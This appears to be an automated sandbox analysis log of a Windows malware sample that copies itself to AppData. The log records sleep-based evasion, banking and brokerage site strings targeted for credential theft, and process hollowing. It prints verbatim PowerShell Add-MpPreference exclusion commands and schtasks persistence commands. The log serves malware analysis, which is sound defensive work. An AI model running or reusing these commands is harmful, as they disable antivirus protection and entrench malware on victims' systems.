                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598577Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598465Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598134Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598016Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597906Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597795Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597687Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597466Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597140Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596921Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596812Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596702Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596593Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596484Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596375Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596266Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595937Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595718Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595500Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595172Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594733Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599766
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599285
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599156
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599047
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598937
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598828
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598718
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598609
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598499
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598390
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598281
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598172
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598062
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597953
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597843
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597730
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597609
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597500
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597390
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597281
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597172
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597062
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596948
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596828
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596687
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596578
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596469
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596331
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596203
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596092
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595984
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595872
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595766
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595654
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595547
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595437
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595328
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595219
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595094
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594984
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594874
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594766
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594656
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594547
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594437
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3697123454.0000000001234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4.0.
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                      Source: aoTiGLRa.exe, 00000014.00000002.3696276576.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                      Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC9548 LdrInitializeThunk,14_2_06CC9548
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory written: C:\Users\user\Desktop\Ti5nuRV7y4.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Users\user\Desktop\Ti5nuRV7y4.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
